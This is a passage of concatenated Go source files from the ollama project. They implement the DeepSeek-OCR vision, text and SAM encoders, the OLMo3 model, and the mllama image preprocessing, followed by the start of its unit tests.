embeds)) hiddenStates := m.PreLayerNorm.Forward(ctx, embeds, m.Options.eps) for _, block := range m.Blocks { hiddenStates = block.Forward(ctx, hiddenStates, m.Options) } return hiddenStates } type visionOptions struct { hiddenSize, numHeads int eps float32 imageSize, patchSize int } func (o visionOptions) headDim() int { return o.hiddenSize / o.numHeads } type visionBlock struct { Norm1 *nn.LayerNorm `gguf:"layer_norm1"` Attention *visionAttention `gguf:"self_attn"` Norm2 *nn.LayerNorm `gguf:"layer_norm2"` FeedForward *visionMLP `gguf:"mlp"` } func (m *visionBlock) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts visionOptions) ml.Tensor { residual := hiddenStates hiddenStates = m.Norm1.Forward(ctx, hiddenStates, opts.eps) hiddenStates = m.Attention.Forward(ctx, hiddenStates, opts) hiddenStates = hiddenStates.Add(ctx, residual) residual = hiddenStates hiddenStates = m.Norm2.Forward(ctx, hiddenStates, opts.eps) hiddenStates = m.FeedForward.Forward(ctx, hiddenStates) hiddenStates = hiddenStates.Add(ctx, residual) return hiddenStates } type visionAttention struct { QKV *nn.Linear `gguf:"qkv_proj"` Output *nn.Linear `gguf:"out_proj"` } func (m *visionAttention) Forward(ctx ml.Context, t ml.Tensor, opts visionOptions) ml.Tensor { qkv := m.QKV.Forward(ctx, t) qkv = qkv.Reshape(ctx, opts.headDim(), -1, qkv.Dim(1), qkv.Dim(2)) chunks := qkv.Chunk(ctx, 1, opts.numHeads) query, key, value := chunks[0], chunks[1], chunks[2] attention := nn.Attention(ctx, query, key, value, 1/math.Sqrt(float64(opts.headDim())), nil) attention = attention.Reshape(ctx, -1, attention.Dim(2), attention.Dim(3)) return m.Output.Forward(ctx, attention) } type visionMLP struct { FC1 *nn.Linear `gguf:"fc1"` FC2 *nn.Linear `gguf:"fc2"` } func (m *visionMLP) Forward(ctx ml.Context, t ml.Tensor) ml.Tensor { return m.FC2.Forward(ctx, m.FC1.Forward(ctx, t).QuickGELU(ctx)) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/deepseekocr/model_text.go
model/models/deepseekocr/model_text.go
package deepseekocr import ( "math" "github.com/ollama/ollama/kvcache" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" "github.com/ollama/ollama/ml/nn/rope" ) type textModel struct { TokenEmbedding *nn.Embedding `gguf:"token_embd"` Blocks []textBlock `gguf:"blk"` OutputNorm *nn.RMSNorm `gguf:"output_norm"` Output *nn.Linear `gguf:"output"` Options textOptions } func (m *textModel) Shift(ctx ml.Context, layer int, key, shift ml.Tensor) (ml.Tensor, error) { return m.Options.applyRotaryPositionEmbeddings(ctx, key, shift), nil } type textOptions struct { hiddenSize, numHeads, numKVHeads, numExperts, numExpertsUsed int ropeBase, ropeScale, eps float32 } func (o textOptions) headDim() int { return o.hiddenSize / o.numHeads } func (o textOptions) applyRotaryPositionEmbeddings(ctx ml.Context, states, positions ml.Tensor) ml.Tensor { return nn.RoPE(ctx, states, positions, o.headDim(), o.ropeBase, 1/o.ropeScale, rope.WithTypeNeoX()) } type textBlock struct { AttentionNorm *nn.RMSNorm `gguf:"attn_norm"` Attention *textAttention MLPNNorm *nn.RMSNorm `gguf:"ffn_norm"` FeedForward textFeedForward } func (m *textBlock) Forward(ctx ml.Context, hiddenStates, positions, outputs ml.Tensor, cache kvcache.Cache, opts textOptions) ml.Tensor { residual := hiddenStates hiddenStates = m.AttentionNorm.Forward(ctx, hiddenStates, opts.eps) hiddenStates = m.Attention.Forward(ctx, hiddenStates, positions, cache, opts) if outputs != nil { hiddenStates = hiddenStates.Rows(ctx, outputs) residual = residual.Rows(ctx, outputs) } hiddenStates = hiddenStates.Add(ctx, residual) residual = hiddenStates hiddenStates = m.MLPNNorm.Forward(ctx, hiddenStates, opts.eps) hiddenStates = m.FeedForward.Forward(ctx, hiddenStates, opts) return hiddenStates.Add(ctx, residual) } type textAttention struct { Query *nn.Linear `gguf:"attn_q"` Key *nn.Linear `gguf:"attn_k"` Value *nn.Linear `gguf:"attn_v"` Output *nn.Linear `gguf:"attn_output"` } func (m *textAttention) Forward(ctx ml.Context, hiddenStates, 
positions ml.Tensor, cache kvcache.Cache, opts textOptions) ml.Tensor { query := m.Query.Forward(ctx, hiddenStates) query = query.Reshape(ctx, opts.headDim(), opts.numHeads, -1) key := m.Key.Forward(ctx, hiddenStates) key = key.Reshape(ctx, opts.headDim(), opts.numKVHeads, -1) value := m.Value.Forward(ctx, hiddenStates) value = value.Reshape(ctx, opts.headDim(), opts.numKVHeads, -1) query = opts.applyRotaryPositionEmbeddings(ctx, query, positions) key = opts.applyRotaryPositionEmbeddings(ctx, key, positions) attention := nn.Attention(ctx, query, key, value, 1./math.Sqrt(float64(opts.headDim())), cache) attention = attention.Reshape(ctx, -1, attention.Dim(2)) return m.Output.Forward(ctx, attention) } type textFeedForward interface { Forward(ml.Context, ml.Tensor, textOptions) ml.Tensor } type textMoe struct { Router *nn.Linear `gguf:"ffn_gate_inp"` Gate *nn.LinearBatch `gguf:"ffn_gate_exps"` Up *nn.LinearBatch `gguf:"ffn_up_exps"` Down *nn.LinearBatch `gguf:"ffn_down_exps"` SharedExperts *textMLP `gguf:",suf:_shexp"` } func (m *textMoe) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts textOptions) ml.Tensor { scores := m.Router.Forward(ctx, hiddenStates).Softmax(ctx) indices := scores.TopK(ctx, opts.numExpertsUsed) weights := scores.Reshape(ctx, 1, opts.numExperts, hiddenStates.Dim(1)).Rows(ctx, indices) experts := hiddenStates.Reshape(ctx, hiddenStates.Dim(0), 1, hiddenStates.Dim(1)) experts = m.Gate.Forward(ctx, experts, indices).SILU(ctx, m.Up.Forward(ctx, experts, indices)) experts = m.Down.Forward(ctx, experts, indices) experts = experts.Mul(ctx, weights) expert := func(i int) ml.Tensor { return experts.View( ctx, i*experts.Stride(1), experts.Dim(0), experts.Stride(2), experts.Dim(2), ) } routedStates := expert(0) for i := 1; i < opts.numExpertsUsed; i++ { routedStates = routedStates.Add(ctx, expert(i)) } sharedStates := m.SharedExperts.Forward(ctx, hiddenStates, opts) return routedStates.Add(ctx, sharedStates) } type textMLP struct { Gate *nn.Linear 
`gguf:"ffn_gate"` Up *nn.Linear `gguf:"ffn_up"` Down *nn.Linear `gguf:"ffn_down"` } func (m *textMLP) Forward(ctx ml.Context, hiddenStates ml.Tensor, _ textOptions) ml.Tensor { hiddenStates = m.Gate.Forward(ctx, hiddenStates).SILU(ctx, m.Up.Forward(ctx, hiddenStates)) return m.Down.Forward(ctx, hiddenStates) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/deepseekocr/model_sam.go
model/models/deepseekocr/model_sam.go
package deepseekocr import ( "math" "slices" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" ) type samModel struct { PatchEmbedding *nn.Conv2D `gguf:"patch_embd"` PositionEmbedding ml.Tensor `gguf:"position_embd"` Blocks []samBlock `gguf:"blk"` Neck *samNeck `gguf:"neck"` Net2 *nn.Conv2D `gguf:"net_2"` Net3 *nn.Conv2D `gguf:"net_3"` Options samOptions } func (m *samModel) absolutePositionEmbedding(ctx ml.Context, hiddenStates ml.Tensor) ml.Tensor { source := m.PositionEmbedding.Dim(1) target := hiddenStates.Dim(2) if source != target { positionEmbed := m.PositionEmbedding.Permute(ctx, 2, 0, 1, 3) positionEmbed = positionEmbed.Interpolate(ctx, [4]int{target, target, hiddenStates.Dim(0), 1}, ml.SamplingModeBilinear) return positionEmbed.Permute(ctx, 1, 2, 0, 3).Contiguous(ctx) } return m.PositionEmbedding } func (m *samModel) Forward(ctx ml.Context, t ml.Tensor) ml.Tensor { hiddenStates := m.PatchEmbedding.Forward(ctx, t, 16, 16, 0, 0, 1, 1) hiddenStates = hiddenStates.Permute(ctx, 1, 2, 0, 3).Contiguous(ctx) if m.PositionEmbedding != nil { hiddenStates = hiddenStates.Add(ctx, m.absolutePositionEmbedding(ctx, hiddenStates)) } for i, block := range m.Blocks { var windowSize int if !slices.Contains(m.Options.globalAttentionLayers, int32(i)) { windowSize = 14 } hiddenStates = block.Forward(ctx, hiddenStates, windowSize, m.Options) } hiddenStates = hiddenStates.Permute(ctx, 2, 0, 1, 3).Contiguous(ctx) hiddenStates = m.Neck.Forward(ctx, hiddenStates, m.Options) hiddenStates = m.Net2.Forward(ctx, hiddenStates, 2, 2, 1, 1, 1, 1) hiddenStates = m.Net3.Forward(ctx, hiddenStates, 2, 2, 1, 1, 1, 1) return hiddenStates } type samOptions struct { hiddenSize, numHeads int eps float32 globalAttentionLayers []int32 } func (o samOptions) headDim() int { return o.hiddenSize / o.numHeads } type samBlock struct { Norm1 *nn.LayerNorm `gguf:"norm1"` Attention *samAttention `gguf:"attn"` Norm2 *nn.LayerNorm `gguf:"norm2"` FeedForward *samMLP `gguf:"mlp"` } func (m 
*samBlock) Forward(ctx ml.Context, hiddenStates ml.Tensor, windowSize int, opts samOptions) ml.Tensor { c, w, h := hiddenStates.Dim(0), hiddenStates.Dim(1), hiddenStates.Dim(2) residual := hiddenStates hiddenStates = m.Norm1.Forward(ctx, hiddenStates, opts.eps) var pw, ph int if windowSize > 0 { pw = (windowSize - hiddenStates.Dim(1)%windowSize) % windowSize ph = (windowSize - hiddenStates.Dim(2)%windowSize) % windowSize if pw > 0 || ph > 0 { hiddenStates = hiddenStates.Pad(ctx, 0, pw, ph, 0) } hiddenStates = hiddenStates.Reshape(ctx, c*windowSize, (w+pw)/windowSize, windowSize, -1) hiddenStates = hiddenStates.Permute(ctx, 0, 2, 1, 3).Contiguous(ctx, c, windowSize, windowSize, -1) } hiddenStates = m.Attention.Forward(ctx, hiddenStates, opts) if windowSize > 0 { hiddenStates = hiddenStates.Reshape(ctx, c*windowSize, windowSize, (w+pw)/windowSize, -1) hiddenStates = hiddenStates.Permute(ctx, 0, 2, 1, 3) hiddenStates = hiddenStates.Contiguous(ctx, c, w+pw, h+ph, -1) hiddenStates = hiddenStates.Pad(ctx, 0, -pw, -ph, 0) } hiddenStates = hiddenStates.Add(ctx, residual) residual = hiddenStates hiddenStates = m.Norm2.Forward(ctx, hiddenStates, opts.eps) hiddenStates = m.FeedForward.Forward(ctx, hiddenStates, opts) return hiddenStates.Add(ctx, residual) } type samAttention struct { QKV *nn.Linear `gguf:"qkv"` Output *nn.Linear `gguf:"proj"` RelativePosition *struct { Height ml.Tensor `gguf:"h"` Width ml.Tensor `gguf:"w"` } `gguf:",pre:rel_pos_"` } func relativeCoordinates(ctx ml.Context, qn, kn int) ml.Tensor { s := make([]int32, qn*kn) for i := range qn { for j := range kn { q := i * max(kn/qn, 1) k := j * max(qn/kn, 1) s[i*kn+j] = int32(q - k + (kn-1)*max(qn/kn, 1)) } } return ctx.Input().FromInts(s, qn*kn) } func relativePositions(ctx ml.Context, positions ml.Tensor, qn, kn int) ml.Tensor { maxRelativeDistance := 2*max(qn, kn) - 1 if positions.Dim(1) != maxRelativeDistance { // linear interpolation kernel not available so approx. 
with bilinear interpolation positions = positions.Interpolate(ctx, [4]int{positions.Dim(0), maxRelativeDistance, 1, 1}, ml.SamplingModeBilinear) } rc := relativeCoordinates(ctx, qn, kn) return positions.Rows(ctx, rc).Reshape(ctx, positions.Dim(0), kn, qn) } func (m *samAttention) decomposedRelativePositions(ctx ml.Context, query ml.Tensor, qn, kn []int) (ml.Tensor, ml.Tensor) { qh, qw := qn[0], qn[1] kh, kw := kn[0], kn[1] rh := relativePositions(ctx, m.RelativePosition.Height, qh, kh) rw := relativePositions(ctx, m.RelativePosition.Width, qw, kw) query = query.Contiguous(ctx, query.Dim(0), qw, qh, -1) rh = rh.Mulmat(ctx, query).Reshape(ctx, 1, kh, qh*qw, -1) rw = rw.Mulmat(ctx, query.Permute(ctx, 0, 2, 1, 3)).Permute(ctx, 0, 2, 1, 3).Contiguous(ctx, kw, 1, qh*qw, -1) return rh, rw } func (m *samAttention) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts samOptions) ml.Tensor { w, h, b := hiddenStates.Dim(1), hiddenStates.Dim(2), hiddenStates.Dim(3) qkv := m.QKV.Forward(ctx, hiddenStates) qkv = qkv.Reshape(ctx, opts.headDim(), -1, w*h, b) chunks := qkv.Chunk(ctx, 1, opts.numHeads) query, key, value := chunks[0], chunks[1], chunks[2] ctx.Forward(query, key, value) query = query.Permute(ctx, 0, 2, 1, 3) rh, rw := m.decomposedRelativePositions(ctx, query, []int{h, w}, []int{h, w}) mask := rh.Repeat(ctx, 0, rw.Dim(0)).Add(ctx, rw) mask = mask.Reshape(ctx, h*w, -1, opts.numHeads, b) key = key.Permute(ctx, 0, 2, 1, 3) scores := key.MulmatFullPrec(ctx, query) scores = scores.Scale(ctx, 1/math.Sqrt(float64(opts.headDim()))) scores = scores.Add(ctx, mask) scores = scores.Softmax(ctx) value = value.Permute(ctx, 1, 2, 0, 3).Contiguous(ctx) attention := value.Mulmat(ctx, scores) attention = attention.Permute(ctx, 0, 2, 1, 3) attention = attention.Contiguous(ctx, -1, w, h, b) return m.Output.Forward(ctx, attention) } type samMLP struct { Lin1 *nn.Linear `gguf:"lin1"` Lin2 *nn.Linear `gguf:"lin2"` } func (m *samMLP) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts 
samOptions) ml.Tensor { return m.Lin2.Forward(ctx, m.Lin1.Forward(ctx, hiddenStates).GELU(ctx)) } type LayerNorm2D struct { Weight ml.Tensor `gguf:"weight"` Bias ml.Tensor `gguf:"bias"` } func (ln *LayerNorm2D) Forward(ctx ml.Context, x ml.Tensor, eps float32) ml.Tensor { x = x.Permute(ctx, 1, 2, 0, 3).Contiguous(ctx) u := x.Mean(ctx) d := x.Sub(ctx, u) s := d.Sqr(ctx).Mean(ctx) x = d.Div(ctx, s.Add(ctx, ctx.Input().FromFloats([]float32{eps}, 1)).Sqrt(ctx)) x = x.Mul(ctx, ln.Weight).Add(ctx, ln.Bias) return x.Permute(ctx, 2, 0, 1, 3).Contiguous(ctx) } type samNeck struct { C1 *nn.Conv2D `gguf:"0"` LN1 *LayerNorm2D `gguf:"1"` C2 *nn.Conv2D `gguf:"2"` LN2 *LayerNorm2D `gguf:"3"` } func (m *samNeck) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts samOptions) ml.Tensor { hiddenStates = m.C1.Forward(ctx, hiddenStates, 1, 1, 0, 0, 1, 1) hiddenStates = m.LN1.Forward(ctx, hiddenStates, opts.eps) hiddenStates = m.C2.Forward(ctx, hiddenStates, 1, 1, 1, 1, 1, 1) hiddenStates = m.LN2.Forward(ctx, hiddenStates, opts.eps) return hiddenStates }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/olmo3/model.go
model/models/olmo3/model.go
package olmo3 import ( "fmt" "math" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/kvcache" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" "github.com/ollama/ollama/ml/nn/rope" "github.com/ollama/ollama/model" "github.com/ollama/ollama/model/input" ) const ( cacheTypeSWA = 0 cacheTypeCausal = 1 ) type Options struct { hiddenSize, numHeads, numKVHeads int eps, ropeBase, ropeScale float32 originalContextLength int attnFactor float32 ropeType string ropeExtrapolation float32 slidingWindowPattern []bool } type Model struct { model.Base model.TextProcessor TokenEmbedding *nn.Embedding `gguf:"token_embd"` Layers []Layer `gguf:"blk"` OutputNorm *nn.RMSNorm `gguf:"output_norm"` Output *nn.Linear `gguf:"output,alt:token_embd"` Options } func New(c fs.Config) (model.Model, error) { vocabulary := model.Vocabulary{ Values: c.Strings("tokenizer.ggml.tokens"), Scores: c.Floats("tokenizer.ggml.scores"), Types: c.Ints("tokenizer.ggml.token_type"), Merges: c.Strings("tokenizer.ggml.merges"), AddBOS: c.Bool("tokenizer.ggml.add_bos_token", false), BOS: []int32{int32(c.Uint("tokenizer.ggml.bos_token_id"))}, AddEOS: c.Bool("tokenizer.ggml.add_eos_token", false), EOS: append( []int32{int32(c.Uint("tokenizer.ggml.eos_token_id"))}, c.Ints("tokenizer.ggml.eos_token_ids")..., ), } processor := model.NewBytePairEncoding( &vocabulary, "(?i:'s|'t|'re|'ve|'m|'ll|'d)|[^\\r\\n\\p{L}\\p{N}]?\\p{L}+|\\p{N}{1,3}| ?[^\\s\\p{L}\\p{N}]+[\\r\\n]*|\\s*[\\r\\n]+|\\s+(?!\\S)|\\s+", ) m := Model{ TextProcessor: processor, Layers: make([]Layer, c.Uint("block_count")), Options: Options{ hiddenSize: int(c.Uint("embedding_length")), numHeads: int(c.Uint("attention.head_count")), numKVHeads: int(c.Uint("attention.head_count_kv")), eps: c.Float("attention.layer_norm_rms_epsilon"), ropeBase: c.Float("rope.freq_base", 1e4), ropeScale: c.Float("rope.scaling.factor", 1), originalContextLength: int(c.Uint("rope.scaling.original_context_length")), attnFactor: c.Float("rope.scaling.attn_factor", 
1), ropeType: c.String("rope.scaling.type"), ropeExtrapolation: c.Float("rope.scaling.extrapolation_factor", 1.0), slidingWindowPattern: c.Bools("attention.sliding_window_pattern"), }, } m.Cache = kvcache.NewWrapperCache( kvcache.NewSWACache(int32(c.Uint("attention.sliding_window")), m.Shift), kvcache.NewCausalCache(m.Shift), ) return &m, nil } type SelfAttention struct { Query *nn.Linear `gguf:"attn_q"` Key *nn.Linear `gguf:"attn_k"` Value *nn.Linear `gguf:"attn_v"` Output *nn.Linear `gguf:"attn_output"` QNorm *nn.RMSNorm `gguf:"attn_q_norm"` KNorm *nn.RMSNorm `gguf:"attn_k_norm"` } func (o Options) applyRotaryPositionEmbeddings(ctx ml.Context, states, positions ml.Tensor, isSWA bool) ml.Tensor { freqScale := float32(1.0) ropeOpts := []func(*rope.Options){rope.WithTypeNeoX()} if !isSWA { freqScale = 1. / o.ropeScale if o.originalContextLength > 0 { ropeOpts = append(ropeOpts, rope.WithOriginalContextLength(o.originalContextLength), rope.WithExtrapolationFactor(o.ropeExtrapolation), ) } } return nn.RoPE(ctx, states, positions, o.hiddenSize/o.numHeads, o.ropeBase, freqScale, ropeOpts...) 
} func (sa *SelfAttention) Forward(ctx ml.Context, hiddenState, positions ml.Tensor, cache kvcache.Cache, m *Model, isSWA bool) ml.Tensor { batchSize := hiddenState.Dim(1) headDim := m.hiddenSize / m.numHeads query := sa.Query.Forward(ctx, hiddenState) query = sa.QNorm.Forward(ctx, query, m.eps) query = query.Reshape(ctx, headDim, m.numHeads, batchSize) query = m.Options.applyRotaryPositionEmbeddings(ctx, query, positions, isSWA) key := sa.Key.Forward(ctx, hiddenState) key = sa.KNorm.Forward(ctx, key, m.eps) key = key.Reshape(ctx, headDim, m.numKVHeads, batchSize) key = m.Options.applyRotaryPositionEmbeddings(ctx, key, positions, isSWA) value := sa.Value.Forward(ctx, hiddenState) value = value.Reshape(ctx, headDim, m.numKVHeads, batchSize) attention := nn.Attention(ctx, query, key, value, 1.0/math.Sqrt(float64(headDim)), cache) attention = attention.Reshape(ctx, m.hiddenSize, batchSize) return sa.Output.Forward(ctx, attention) } func (m *Model) Shift(ctx ml.Context, layer int, key, shift ml.Tensor) (ml.Tensor, error) { isSWA := m.isSWALayer(layer) return m.Options.applyRotaryPositionEmbeddings(ctx, key, shift, isSWA), nil } type MLP struct { Up *nn.Linear `gguf:"ffn_up"` Down *nn.Linear `gguf:"ffn_down"` Gate *nn.Linear `gguf:"ffn_gate"` } func (mlp *MLP) Forward(ctx ml.Context, hiddenState ml.Tensor, m *Model) ml.Tensor { hiddenState = mlp.Gate.Forward(ctx, hiddenState).SILU(ctx, mlp.Up.Forward(ctx, hiddenState)) return mlp.Down.Forward(ctx, hiddenState) } type Layer struct { SelfAttention *SelfAttention PostAttentionNorm *nn.RMSNorm `gguf:"post_attention_norm"` MLP *MLP PostFFWNorm *nn.RMSNorm `gguf:"post_ffw_norm"` } func (l *Layer) Forward(ctx ml.Context, hiddenState, positions, outputs ml.Tensor, cache kvcache.Cache, m *Model, isSWA bool) ml.Tensor { residual := hiddenState hiddenState = l.SelfAttention.Forward(ctx, hiddenState, positions, cache, m, isSWA) if outputs != nil { hiddenState = hiddenState.Rows(ctx, outputs) residual = residual.Rows(ctx, outputs) } 
hiddenState = l.PostAttentionNorm.Forward(ctx, hiddenState, m.eps) hiddenState = hiddenState.Add(ctx, residual) residual = hiddenState hiddenState = l.MLP.Forward(ctx, hiddenState, m) hiddenState = l.PostFFWNorm.Forward(ctx, hiddenState, m.eps) return hiddenState.Add(ctx, residual) } // OLMo3 has Sliding Window Attention (SWA) for 3 out of every 4 layers. func (m *Model) isSWALayer(layerIdx int) bool { return m.Options.slidingWindowPattern[layerIdx] } func (m *Model) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) { positions := ctx.Input().FromInts(batch.Positions, len(batch.Positions)) hiddenState := m.TokenEmbedding.Forward(ctx, batch.Inputs) for i, layer := range m.Layers { m.Cache.SetLayer(i) cacheType := cacheTypeSWA isSWA := m.isSWALayer(i) if !isSWA { cacheType = cacheTypeCausal } wc, ok := m.Cache.(*kvcache.WrapperCache) if !ok { return nil, fmt.Errorf("expected *kvcache.WrapperCache, got %T", m.Cache) } wc.SetLayerType(cacheType) var outputs ml.Tensor if i == len(m.Layers)-1 { outputs = batch.Outputs } hiddenState = layer.Forward(ctx, hiddenState, positions, outputs, m.Cache, m, isSWA) } hiddenState = m.OutputNorm.Forward(ctx, hiddenState, m.eps) return m.Output.Forward(ctx, hiddenState), nil } func init() { model.Register("olmo3", New) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/mllama/process_image.go
model/models/mllama/process_image.go
package mllama import ( "image" "math" "slices" "golang.org/x/image/draw" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/model/imageproc" ) type supportedAspectRatio struct { rank, width, height int } func (a supportedAspectRatio) Point() image.Point { return image.Point{a.width, a.height} } func (a supportedAspectRatio) numTiles() int { return a.width * a.height } type ImageProcessor struct { imageSize, numChannels, maxNumTiles int mean, std [3]float32 } func newImageProcessor(c fs.Config) ImageProcessor { return ImageProcessor{ imageSize: int(c.Uint("vision.image_size")), numChannels: int(c.Uint("vision.num_channels")), maxNumTiles: int(c.Uint("vision.max_num_tiles")), mean: imageproc.ClipDefaultMean, std: imageproc.ClipDefaultSTD, } } func (p ImageProcessor) supportedAspectRatios() (ratios []supportedAspectRatio) { for w := 1; w <= p.maxNumTiles; w++ { for h := 1; h <= p.maxNumTiles/w; h++ { ratios = append(ratios, supportedAspectRatio{len(ratios) + 1, w, h}) } } return ratios } func (p ImageProcessor) fitToCanvas(imageSize, canvasSize image.Point) image.Point { tw := min(max(imageSize.X, p.imageSize), canvasSize.X) th := min(max(imageSize.Y, p.imageSize), canvasSize.Y) r := min( float64(tw)/float64(imageSize.X), float64(th)/float64(imageSize.Y), ) w := min(int(math.Floor(float64(imageSize.X)*r)), tw) h := min(int(math.Floor(float64(imageSize.Y)*r)), th) return image.Point{w, h} } func (p ImageProcessor) optimalTiledCanvas(imageSize image.Point) image.Point { possibleTileArrangements := p.supportedAspectRatios() possibleCanvasSizes := make([]image.Point, len(possibleTileArrangements)) for i, pta := range possibleTileArrangements { possibleCanvasSizes[i] = image.Point{pta.width * p.imageSize, pta.height * p.imageSize} } scales := make([]float64, len(possibleCanvasSizes)) for i, pcs := range possibleCanvasSizes { scales[i] = min( float64(pcs.Y)/float64(imageSize.Y), float64(pcs.X)/float64(imageSize.X), ) } var minUpscale float64 var maxDownscale float64 
var upscale bool for _, s := range scales { if s > 1.0 { upscale = true if minUpscale == 0 { minUpscale = s } else { minUpscale = min(minUpscale, s) } } else { maxDownscale = max(maxDownscale, s) } } selectedScale := maxDownscale if upscale { selectedScale = minUpscale } var selectedCanvas image.Point for n, pcs := range possibleCanvasSizes { if scales[n] == selectedScale { // choose the smallest possible canvas if selectedCanvas.X == 0 && selectedCanvas.Y == 0 { selectedCanvas = pcs } else if pcs.X*pcs.Y < selectedCanvas.X*selectedCanvas.Y { selectedCanvas = pcs } } } return selectedCanvas } func (p ImageProcessor) splitToTiles(img image.Image, numTilesSize image.Point) []image.Image { b := img.Bounds() width := b.Max.X - b.Min.X height := b.Max.Y - b.Min.Y tileHeight := height / numTilesSize.Y tileWidth := width / numTilesSize.X images := make([]image.Image, 0, numTilesSize.Y*numTilesSize.X) for h := range numTilesSize.Y { for w := range numTilesSize.X { rect := image.Rect(tileWidth*w, tileHeight*h, tileWidth*(w+1), tileHeight*(h+1)) if subImg, ok := img.(interface { SubImage(image.Rectangle) image.Image }); ok { images = append(images, subImg.SubImage(rect)) } else { // Handle the case where img does not implement SubImage // This is a fallback and may not be efficient newImg := image.NewRGBA(rect) draw.Draw(newImg, rect, img, rect.Min, draw.Src) images = append(images, newImg) } } } return images } func (p ImageProcessor) resize(img image.Image) (image.Image, image.Point) { b := img.Bounds() canvasSize := p.optimalTiledCanvas(b.Max) aspectRatio := image.Point{canvasSize.X / p.imageSize, canvasSize.Y / p.imageSize} newSize := p.fitToCanvas(b.Max, canvasSize) dst := image.NewRGBA(image.Rect(0, 0, newSize.X, newSize.Y)) // scaling choices: // NearestNeighbor fast, blocky output // ApproxBiLinear fast, medium quality // BiLinear slow, high quality // CatmullRom very slow, very high quality draw.BiLinear.Scale(dst, dst.Rect, img, b, draw.Over, nil) return dst, 
aspectRatio } func (p ImageProcessor) pad(img image.Image, aspectRatio image.Point) image.Image { paddedSize := image.Point{ X: p.imageSize * aspectRatio.X, Y: p.imageSize * aspectRatio.Y, } dst := image.NewRGBA(image.Rect(0, 0, paddedSize.X, paddedSize.Y)) draw.Draw(dst, img.Bounds(), img, image.Point{0, 0}, draw.Over) return dst } func (p ImageProcessor) pack(img image.Image, aspectRatio image.Point) []float32 { subImages := p.splitToTiles(img, aspectRatio) var pixelVals []float32 for _, subImg := range subImages { bounds := subImg.Bounds() var rVals, gVals, bVals []float32 for y := bounds.Min.Y; y < bounds.Max.Y; y++ { for x := bounds.Min.X; x < bounds.Max.X; x++ { c := subImg.At(x, y) r, g, b, _ := c.RGBA() rVal := float32(r>>8) / 255.0 gVal := float32(g>>8) / 255.0 bVal := float32(b>>8) / 255.0 rVal = (rVal - p.mean[0]) / p.std[0] gVal = (gVal - p.mean[1]) / p.std[1] bVal = (bVal - p.mean[2]) / p.std[2] rVals = append(rVals, rVal) gVals = append(gVals, gVal) bVals = append(bVals, bVal) } } pixelVals = append(pixelVals, rVals...) pixelVals = append(pixelVals, gVals...) pixelVals = append(pixelVals, bVals...) } return pixelVals } func (p ImageProcessor) ProcessImage(img image.Image) ([]float32, supportedAspectRatio, error) { newImage, newImageRatio := p.resize(img) newImage = p.pad(newImage, newImageRatio) pixelValues := p.pack(newImage, newImageRatio) supportedAspectRatios := p.supportedAspectRatios() aspectRatioID := slices.IndexFunc(supportedAspectRatios, func(i supportedAspectRatio) bool { return i.width == newImageRatio.X && i.height == newImageRatio.Y }) return pixelValues, supportedAspectRatios[aspectRatioID], nil }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/mllama/process_image_test.go
model/models/mllama/process_image_test.go
package mllama

import (
	"image"
	"testing"

	"github.com/google/go-cmp/cmp"
)

// TestSupportedAspectRatios verifies the enumeration of tile layouts
// (rank, width, height) produced for increasing maxNumTiles budgets.
func TestSupportedAspectRatios(t *testing.T) {
	cases := []struct {
		p    ImageProcessor
		want []supportedAspectRatio
	}{
		{
			p: ImageProcessor{maxNumTiles: 1},
			want: []supportedAspectRatio{
				{1, 1, 1},
			},
		},
		{
			p: ImageProcessor{maxNumTiles: 2},
			want: []supportedAspectRatio{
				{1, 1, 1},
				{2, 1, 2},
				{3, 2, 1},
			},
		},
		{
			p: ImageProcessor{maxNumTiles: 3},
			want: []supportedAspectRatio{
				{1, 1, 1},
				{2, 1, 2},
				{3, 1, 3},
				{4, 2, 1},
				{5, 3, 1},
			},
		},
		{
			p: ImageProcessor{maxNumTiles: 4},
			want: []supportedAspectRatio{
				{1, 1, 1},
				{2, 1, 2},
				{3, 1, 3},
				{4, 1, 4},
				{5, 2, 1},
				{6, 2, 2},
				{7, 3, 1},
				{8, 4, 1},
			},
		},
	}

	for _, tt := range cases {
		actual := tt.p.supportedAspectRatios()
		if diff := cmp.Diff(actual, tt.want, cmp.AllowUnexported(supportedAspectRatio{})); diff != "" {
			t.Errorf("mismatch (-got +want):\n%s", diff)
		}
	}
}

// TestFitToCanvas checks aspect-preserving scaling of an image into a canvas,
// with imageSize acting as a lower bound on the target size.
func TestFitToCanvas(t *testing.T) {
	cases := []struct {
		p      ImageProcessor
		image  image.Point
		canvas image.Point
		expect image.Point
	}{
		{
			p:      ImageProcessor{imageSize: 200},
			image:  image.Point{400, 400},
			canvas: image.Point{640, 480},
			expect: image.Point{400, 400},
		},
		{
			p:      ImageProcessor{imageSize: 200},
			image:  image.Point{1024, 768},
			canvas: image.Point{640, 480},
			expect: image.Point{640, 480},
		},
		{
			p:      ImageProcessor{imageSize: 750},
			image:  image.Point{500, 500},
			canvas: image.Point{1000, 1000},
			expect: image.Point{750, 750},
		},
		{
